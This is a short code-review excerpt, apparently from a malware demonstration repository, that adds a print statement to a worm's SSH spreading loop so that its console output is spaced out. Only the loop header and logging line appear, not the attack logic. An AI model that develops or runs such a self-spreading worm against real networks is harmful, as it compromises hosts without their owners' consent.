worm/worm.py

```diff
@@ -57,27 +57,35 @@ def spread_via_ssh(self):
 
         for remote_address in self.generate_addresses_on_network():
             logging.debug('Trying to spread on the remote host: {}'.format(remote_address))
+            print()
```

Comment:
Additional print statements on lines 60 and 86 gets CLI output with spaces between each connection attempt. Example:

![image](https://github.com/PatrikH0lop/malware_showcase/assets/37035706/45cf75b6-7fe5-4571-8056-01acd5ef2fad)